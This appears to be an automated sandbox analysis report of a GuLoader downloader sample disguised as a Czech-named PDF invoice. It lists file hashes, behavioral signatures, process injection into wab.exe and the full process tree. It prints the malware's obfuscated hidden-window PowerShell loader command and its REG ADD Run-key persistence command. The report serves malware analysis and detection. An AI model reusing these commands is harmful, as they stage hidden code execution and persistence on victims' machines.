Analysis
max time kernel: 119s
max time network: 120s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 09-07-2024 09:49

Static task: static1

Behavioral task: behavioral1
  Sample: Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe
  Resource: win7-20240704-en

Behavioral task: behavioral2
  Sample: Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe
  Resource: win10v2004-20240704-en
General
Target: Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe
Size: 398KB
MD5: b1c35e78f5d588430c4f534479def9f2
SHA1: f787dd3327ca04361935f74867f76f16821db99f
SHA256: 4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7
SHA512: 5f78e6794ae313f5ca96c33fe0ecf0c882a18a93caa54bf92823ac42c5c753b6a98d4c77618de2b62cbc9d24e6e500272e4ffa7b25afff20b7e8349fc278a66c
SSDEEP: 12288:9GkmNVhJhqnfP30YhNia+nv4tQD3W/P19QY:9GkmPh7qfPrsQeD3W/bd
Malware Config
Signatures
Guloader,Cloudeye
  A shellcode based downloader first seen in 2020.

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.

Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes:
    description: Set value (str)
    ioc: \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ortyginae = "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\\Audiometeret\\').Rudolph;%Monopolizables% ($masturbated)"
    process: reg.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)

Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  Processes:
    pid 2908 wab.exe (x2)

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes:
    pid 2428 powershell.exe
    pid 2908 wab.exe

Suspicious use of SetThreadContext (1 IoCs)
  Processes:
    PID 2428 (powershell.exe) set thread context of 2908 (wab.exe)

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Modifies registry key (1 TTPs, 1 IoCs)

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes:
    pid 2428 powershell.exe (x8)

Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes:
    pid 2428 powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    Token: SeDebugPrivilege, pid 2428 powershell.exe

Suspicious use of WriteProcessMemory (18 IoCs)
  Processes:
    PID 328 (Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe) wrote to memory of 2428 (powershell.exe) (x4)
    PID 2428 (powershell.exe) wrote to memory of 2908 (wab.exe) (x6)
    PID 2908 (wab.exe) wrote to memory of 2792 (cmd.exe) (x4)
    PID 2792 (cmd.exe) wrote to memory of 2788 (reg.exe) (x4)
Processes

[1] C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe"
    - Suspicious use of WriteProcessMemory
    PID: 328

  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2428

    [3] C:\Program Files (x86)\windows mail\wab.exe
        Command line: "C:\Program Files (x86)\windows mail\wab.exe"
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of WriteProcessMemory
        PID: 2908

      [4] C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
          - Suspicious use of WriteProcessMemory
          PID: 2792

        [5] C:\Windows\SysWOW64\reg.exe
            Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"
            - Adds Run key to start application
            - Modifies registry key
            PID: 2788
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 344KB
MD5: 1a78d0f226d0db154812e61b8cadb4b8
SHA1: e76650e32ed8bc1e3d72dde1aa6566ff031e0c6e
SHA256: 19997e372b58bcd5bacd8b199b1633307f0c89fc3ce7abfd4087ec739742f78e
SHA512: b06759e8bfeb73187c5277aaaa9c6489f51a88f42b461ec0775de6741f6b797dc3c2cbb8f6cf79815078a420a26cde9cedd861c4d16ac73a037e2160efc4ec41

Filesize: 68KB
MD5: d89dac6d6bcfb431c31bdf7d21f48fbd
SHA1: 2f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9
SHA256: ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b
SHA512: 76eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070